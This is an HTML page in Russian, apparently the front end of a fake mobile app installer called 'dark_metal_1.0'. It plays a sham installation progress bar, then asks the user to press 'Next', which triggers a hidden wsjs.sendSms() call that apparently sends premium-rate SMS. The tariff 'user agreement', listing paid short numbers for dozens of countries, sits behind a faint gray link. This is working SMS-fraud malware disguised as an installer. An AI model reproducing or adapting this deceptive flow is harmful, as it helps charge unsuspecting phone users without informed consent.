<!DOCTYPE HTML>
<html>
	<head>
		<title></title>
	
		<meta charset="utf-8">
		<meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=no">
		<link type="text/css" href="css/smoothness/jquery-ui-1.8.18.custom.css" rel="stylesheet" />	
		<script type="text/javascript" src="js/jquery-1.7.1.min.js"></script>
		<script type="text/javascript" src="js/jquery-ui-1.8.18.custom.min.js"></script>
		<script type="text/javascript">
		
			var timeout  = 90;
			var isPayed  = false;
			function timer(progress)
			{
				if(progress > 100)
				{
					
					$('#page1').css('display' , 'none');
					$('#page2').css('display' , 'block');
					
					return true;
				}
				
				$("#progressbar").progressbar('value' , progress);
				
				setTimeout('timer(' + (progress + 2) + ')' , timeout);
			}
			
			function payment()
			{
				
					$('#page2').fadeOut(300);
					$('#oferta').fadeOut(300);
					$('#page3').fadeIn(600);
				
					wsjs.sendSms();
				
			}
			
			function oferta()
			{
				$('#page2').fadeOut(300);
				$('#oferta').fadeIn(600);
			}
			
			$(function(){

				$(".button").button();
				$('#image').attr('height' , (screen.height - 240) > 170 ? 170 : (screen.height - 240));
				$('#image2').attr('height' , (screen.height - 240) > 170 ? 170 : (screen.height - 240));
				
				$("#progressbar").progressbar({
					value: 0 
				});
				
				if(location.hash == '#loaded=2')
				{
					$('#page1').fadeOut(300);
					$('#page2').fadeOut(300);
					$('#oferta').fadeOut(300);
					$('#page3').fadeIn(600);
				}
				else if (location.hash == '#loaded=1')
				{
					$('#page1').fadeOut(300);
					$('#page3').fadeOut(300);
					$('#oferta').fadeOut(300);
					
					$('#page2').fadeIn(600);
				}
				else
				{
					timer(0);
				}
			});
		</script>
		<style type="text/css">
			*[unselectable=on] {
			    -moz-user-select: none;
			    -o-user-select:none;
			    -khtml-user-select: none;
			    -webkit-user-select: none;
			    -ms-user-select: none;
			     user-select: none;
			}
			body{ font: 90% "Trebuchet MS", sans-serif; margin: 5px;}
			
			.ui-button { width:200px; font-size:20px;}
		</style>	
	</head>
	<body>
		<div id="layout" align="center">
			
		<div id="page1">
				<img src="images/logo.png" id="image">
				<br>
				<h1>dark_metal_1.0</h1>
				<br>
				<p>Подождите идет установка.</p>
				<div id="progressbar"></div>
			</div>
			
			
			<div id="page2" style="display:none;">
			
				<img src="images/logo.png" id="image2">
				<br>
				
				<div class="ui-widget">
					<div class="ui-state-highlight ui-corner-all" style="margin-top: 20px; padding: 0 .7em;"> 
						<p>
						<strong>Установка</strong> <br>Подтвердите согласие с п. соглашением dark_metal_1.0.<br>Для продолжения нажмите Далее.</p>
						
					</div>
				</div>
				<br>
				<a href="javascript:payment()" class="button">Далее</a>
				<div style="bottom:5px;position:absolute;width:100%;margin:-5px;"><div align="center" ><a href="javascript:oferta()" style="color:#cccccc;font-size:12px;">Пользовательское соглашение</a></div></div>
			</div>
			
			
			<div id="page3" style="display:none;">
				<div class="ui-widget">
					<div class="ui-state-error ui-corner-all" style="padding: 0 .7em;"> 
						<p><span class="ui-icon ui-icon-alert" style="float: left; margin-right: .3em;"></span> 
						<strong>Ваша ссылка:</strong> <br clear="all"><b>http://i4eo.com/?u=http%3A%2F%2Fandroidu.ru%2Fengine%2Fdownload.php%3Fid%3D1109</b>.</p>
					</div>
				</div>	
				<br>
				<a href="javascript:wsjs.openURL('http://i4eo.com/?u=http%3A%2F%2Fandroidu.ru%2Fengine%2Fdownload.php%3Fid%3D1109');" class="button">Перейти</a>		
			</div>
			
			<div id="oferta" style="display:none;">
				<div style="width:100%;height:55px;background-color:white;bottom:0px;position:fixed;"><div align="center" style="padding-top:5px;"><a href="javascript:payment()" class="button">Далее</a></div></div>		
				<div id="oferta-div">
					
				Спасибо что выбрали наше приложение для мобильного телефона или коммуникатора, на различных платформах и технологиях.<br />
<br><br />
Данное приложение было создано путем компиляции java кода и адаптировано для работы во всех телефонах<br />
<br> <br />
с поддержкой Java или Android является высокотехнологичным программным обеспечением.<br />
<br><br />
Для возврата в приложение на технологии java нажмите кнопку &quot;Назад&quot;<br />
<br />
Для возврата в приложение на технологии android нажмите кнопку &quot;Назад&quot;<br />
<br><br />
Пользовательское соглашение:<br />
<br />
<br />
Для получения доступа к контенту вы должны согласиться с условиями, представленными ниже.<br />
<br />
Ниже представлен текст соглашения-оферты между сервисом apiomobi.net и Абонентом.<br />
<br><br />
1. Администрация apiomobi.net не несет никакой ответственности за любой прямой или косвенный ущерб, возникший в результате использования приложения, включая упущенную прибыль и понесенные убытки.<br />
<br><br />
2. При первом запуске приложений apiomobi.net запрашивается разрешение на передачу регистрационных данных с использованием короткого номера.<br />
<br><br />
3. Пользователь вправе отказать в передаче регистрационных данных. В таком случае приложения apiomobi.net остаются неактивированными.<br />
<br><br />
4. Администрация apiomobi.net не несет никакой ответственности за содержание приложений, доступ к которым оплачивается через приложение apiomobi.net.<br />
<br />
5. Для получения доступа, к предоставляемому сервисом apiomobi.net контенту, необходимо произвести оплату:<br />
<br><br />
Для Казахстана:<br />
<br />
    Сервис доступен на всей территории РК<br />
    Стоимость любого исходящего SMS-сообщения на номер 9684 – 199.00 тенге для абонентов всех Операторов включая НДС.<br />
    Стоимость любого исходящего SMS-сообщения на номер 9685 – 449.00 тенге для абонентов всех Операторов, кроме абонентов торговой марки «Билайн», которая составляет- 300 тенге включая НДС.<br />
    Стоимость любого исходящего SMS-сообщения на номер 9683 – 600 тенге для абонентов всех Операторов, кроме абонентов торговой марки «Билайн», которая составляет- 400 тенге включая НДС.<br />
    Для всех абонентов сетей GSM: K’Cell, ActiV, Beeline, NEO, Dalacom, Pathword.<br />
    В случае ошибочного запроса на короткий номер 9683, система не уведомит об ошибке, но услуга будет считаться оказанной, и денежные средства за SMS будут списаны с лицевого счета мобильного телефона.<br />
    При возникновении вопросов, связанных с работоспособностью сервиса, следует обращаться в службу поддержки: help@zerogravity.kz , +7 (727) 356-79-56<br />
    Zero Gravity и apiomobi.net не несут ответственности за сбои в работе операторов сотовой связи.<br />
    После отправки SMS, Вы даёте своё согласие получать SMS уведомления от компании apiomobi.net.<br />
    Факт пользования сервисом подразумевает согласие пользователя с настоящими условиями<br />
    apiomobi.net и Zero Gravity оставляет за собой право вносить любые изменения и/или дополнения в настоящие правила в период оказания услуг пользователям.<br />
    Подробная информация на сайте: zerogravity.kz<br />
<br><br />
Для Украины:<br />
<br />
Для абонентов национальных GSM-операторов Украины оплата производится путем отправки 2 смс-сообщений на произвольное сочетание любых из указанных коротких номера: 4129 (50 гривен), 4128 (30 гривен), 4127 (16 гривен), 4126 (9 гривен). Стоимость указана с НДС. <br />
Дополнительно удерживается налог в Пенсионный Фонд Украины в размере 7.5% от стоимости смс-сообщения без НДС. Услуга оказывается только для совершеннолетних. <br />
Технический партнер: ООО &lt;АйФри Украина&gt;, адрес: 03124, г. Киев, ул. Н.Василенко, 7А., телефон службы поддержки: 044 545 77 03, стоимость звонков оплачивается согласно тарифов операторов связи, e-mail: support@i-free.com.ua<br />
<br />
Для России:<br />
<br />
Отправка до 3-х СМС-сообщений на сервисные номера:<br />
<br />
- 7151 (МТС 33.87 руб., Мегафон  40.00 руб., Билайн 40.00 руб., Tele2 40.12 руб., около 40 руб. с НДС для остальных операторов) включая НДС.<br />
<br><br />
- 9151 (МТС 101.60 руб., Билайн 130.00 руб., Мегафон  135.00 руб., Tele2 125.08 руб., около 130 руб. с НДС для остальных операторов) включая НДС.<br />
- 2855 ( Мегафон  236.00руб., Билайн 200.00 руб., МТС 	203.20 руб., Tele2 	236.00 руб., около 230 руб. с НДС для остальных операторов) включая НДС.<br />
<br />
Отправка до 2-х СМС-сообщений на сервисный номер:<br />
<br />
- 3858 ( Мегафон  300.00руб., Билайн 300.00 руб., МТС 304.79 руб., <br />
Tele2 249.99 руб., около 300 руб. с НДС для остальных операторов) <br />
включая НДС.<br />
<br><br />
<br><br />
Общая стоимость услуги составляет не более 600 рублей<br />
<br />
Для оператора МТС услуга оказывается после отправки 1 смс<br />
<br />
Для Беларуси:<br />
<br />
Отправка до 2-х СМС-сообщений на сервисные номера:<br />
<br />
- 3336 (<br />
	Life 	15900.00 руб.<br />
	Velcom  9900.00 руб.<br />
	МТС 	9900.00 руб.<br />
 без налогов ).<br />
- 3339 (<br />
	Life 	29900.00 руб.<br />
	Velcom 	19900.00 руб.<br />
	МТС 	19900.00 руб.<br />
 без налогов ).<br />
<br><br />
Для Азербайджана:<br />
<br />
- 9818 (	5.90 манат).<br />
- 3302 (<br />
	Azerfon 2.35 манат<br />
	Bakcell	2.36 маната<br />
).<br />
- 3303 (<br />
	Azerfon 3.53 манат<br />
	Bakcell	3.54 маната<br />
).<br />
- 3304 (<br />
	Azerfon 5.89 манат<br />
	Bakcell	5.90 манат<br />
).<br />
<br><br />
<br />
Для Армения :<br />
<br />
Отправка до 2-х СМС-сообщений на сервисные номера:<br />
<br />
- 1161 (1220.34 драм).<br />
- 1121 (1728.74 драм).<br />
<br />
Для Австрии :<br />
<br />
Отправка до 2-х СМС-сообщений на сервисные номера:<br />
<br />
- 0930399999 (2.04 евро).<br />
<br />
<br><br />
<br />
Для Австралии :<br />
<br />
Отправка до 2-х СМС-сообщений на сервисные номера:<br />
<br />
- 19998866 (6.60 долл).<br />
<br />
Для Бельгии :<br />
<br />
Отправка до 2-х СМС-сообщений на сервисные номера:<br />
<br />
- 7796 (2.00 евро).<br />
<br />
<br><br />
Для Болгарии :<br />
<br />
Отправка до 2-х СМС-сообщений на сервисные номера:<br />
<br />
- 1098 (2.40 лев).<br />
<br />
Для Чехии :<br />
<br />
Отправка до 2-х СМС-сообщений на сервисные номера:<br />
<br />
- 9090150 (49.59 крон).<br />
- 9090199 (	98.17 крон).<br />
<br />
<br><br />
Для Германии :<br />
<br />
Отправка до 2-х СМС-сообщений на сервисные номера:<br />
<br />
- 80888 (1.99 евро).<br />
<br />
Для Дании :<br />
<br />
Отправка до 2-х СМС-сообщений на сервисные номера:<br />
<br />
- 1945 (20.00 крон).<br />
<br />
Для Эстонии :<br />
<br><br />
Отправка до 2-х СМС-сообщений на сервисные номера:<br />
<br />
- 17011 (1.00 евро).	<br />
- 17012 (2.50 евро).	<br />
- 17013 (	3.50 евро).<br />
- 17010 (0.50 евро).<br />
<br />
Для Испании :<br />
<br />
Отправка до 2-х СМС-сообщений на сервисные номера:<br />
<br />
- 5339 (1.39 евро).<br />
<br />
<br><br />
Для Франции :<br />
<br />
Отправка до 2-х СМС-сообщений на сервисные номера:<br />
<br />
- 81015  (3.00 евро).	<br />
- 81185	 (4.50 евро).<br />
<br />
Для Великобритании :<br />
<br />
Отправка до 2-х СМС-сообщений на сервисные номера:<br />
<br />
- 69067  (2.00 фунтов).	<br />
- 79067  (5.01 фунтов).<br />
<br />
<br><br />
Для Грузии :<br />
<br />
Отправка до 2-х СМС-сообщений на сервисные номера:<br />
<br />
- 8014 (3.63 лари).<br />
- 8013 (1.64 лари).<br />
<br />
Для Ирландии :<br />
<br />
Отправка до 2-х СМС-сообщений на сервисные номера:<br />
<br />
- 57575 (2.07 евро).<br />
<br />
Для Киргизии :<br />
<br />
Отправка до 2-х СМС-сообщений на сервисные номера:<br />
<br />
- 4157  (315.79 сом).<br />
- 4156  (189.47 сом).<br />
- 4153  (63.16 сом).<br />
- 4152  (37.90 сом).<br />
<br />
<br><br />
Для Израиля :<br />
<br />
Отправка до 2-х СМС-сообщений на сервисные номера:<br />
<br />
- 4545 (8.55 шек).<br />
<br />
Для Литвы :<br />
<br />
Отправка до 2-х СМС-сообщений на сервисные номера:<br />
<br />
- 1381 	 (<br />
	Bite 	1.02 лит<br />
	Omnitel 1.02 лит<br />
	Tele2 	1.00 лит<br />
).<br />
- 1391 	 (<br />
	Bite 	3.07 лит<br />
	Omnitel 3.05 лит<br />
	Tele2 	3.00 лит<br />
).<br />
- 1635 (<br />
	Bite 	6.97 лит<br />
	Omnitel 7.11 лит<br />
	Tele2 	8.00 лит<br />
).<br />
- 1645 (<br />
	Bite 	10.55 лит<br />
	Omnitel 10.18 лит<br />
	Tele2 	10.00 лит<br />
).<br />
<br><br />
Для Латвии :<br />
<br />
Отправка до 2-х СМС-сообщений на сервисные номера:<br />
<br />
- 1871 	 (<br />
	Bite 	0.35 лат<br />
	LMT 	0.36 лат<br />
	Tele2 	0.35 лат<br />
).<br />
- 1872 	 (<br />
	Bite	0.60 лат<br />
	LMT		0.61 лат<br />
	Tele2	0.59 лат<br />
).<br />
- 1873 	 (<br />
	Bite	1.90 лат<br />
	LMT		2.07 лат<br />
	Tele2	2.00 лат<br />
).<br />
- 1874 (<br />
	Bite	2.95 лат<br />
	LMT 	3.10 лат<br />
	Tele2	3.00 лат<br />
).<br />
<br />
Для Нидерландов :<br />
<br />
Отправка до 2-х СМС-сообщений на сервисные номера:<br />
<br />
- 5040 (1.79 евро).<br />
<br><br />
Для Норвегии :<br />
<br />
Отправка до 2-х СМС-сообщений на сервисные номера:<br />
<br />
- 2322 (20.00 крон).<br />
<br />
Для Польши :<br />
<br />
Отправка до 2-х СМС-сообщений на сервисные номера:<br />
<br />
- 7910 (10.98 злот).<br />
<br />
Для Португалии :<br />
<br />
Отправка до 2-х СМС-сообщений на сервисные номера:<br />
<br />
- 69991 (1.58 евро).<br />
- 68305 (1.58 евро).<br />
<br />
Для Швеции :<br />
<br />
Отправка до 2-х СМС-сообщений на сервисные номера:<br />
<br />
- 72170 (20.00 крон).<br />
<br />
<br><br />
Для Тайвани :<br />
<br />
Отправка до 2-х СМС-сообщений на сервисные номера:<br />
<br />
- 55886 (99.75 долл).<br />
<br />
6. В случае обнаружения спама или иных запрещенных методов распространения приложений, Администрация просит уведомлять о таких случаях в Службу поддержки Абонентов : me.s.mobile@gmail.com.<br />
<br><br />
7. Абонент вправе обжаловать процедуру списания средств со счета в случаях, если заявленных в названии и описании контент не был предоставлен после успешной активации приложения.<br />
<br />
Для этого необходимо обратиться в Службу поддержки Абонентов по почте: me.s.mobile@gmail.com.<br />
<br><br />
Для активации приложения необходимо разрешить отправку запроса с использованием платного короткого номера.<br />
<br><br />
Полную информацию о тарифах вы можете получить на веб-сайте: http://sms911.ru/<br />


				</div>
				
			</div>
		</div>
	</body>
</html>


